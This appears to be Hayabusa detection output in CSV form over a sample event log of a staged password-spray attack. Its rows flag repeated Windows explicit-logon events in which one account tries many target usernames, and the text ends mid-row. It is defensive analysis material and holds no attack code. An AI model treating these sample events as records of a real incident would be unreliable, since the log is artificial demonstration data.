DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:26.628 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:27.690 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:28.763 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:29.837 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:30.921 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:31.996 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:33.058 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:34.138 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:35.199 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:36.266 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:37.375 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:38.439 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:39.499 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:40.560 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:41.637 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:42.734 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:43.795 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:44.875 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:45.951 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:47.017 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:48.096 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:49.176 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:50.264 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:51.340 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:52.405 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:53.466 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:54.572 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:55.671 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:56.741 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:57.817 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:58.894 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:59.965 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:01.026 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:02.115 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:03.191 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:04.272 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:05.348 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:06.426 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:07.478 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:08.564 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:09.668 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:10.717 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:11.809 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:12.857 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:13.904 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:14.972 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:16.050 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:17.129 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:18.186 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:19.254 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:20.329 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:21.401 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:22.487 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:23.577 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:24.660 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:25.732 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:26.794 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:27.863 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:28.925 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:29.993 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:31.050 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:32.142 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:33.206 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:34.265 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:35.340 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:36.403 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:37.453 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:38.533 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:39.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:40.691 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:41.769 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:42.852 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:43.922 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:44.998 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:46.080 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:47.159 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:48.237 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:49.314 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:50.388 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:51.455 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:52.532 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:53.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source 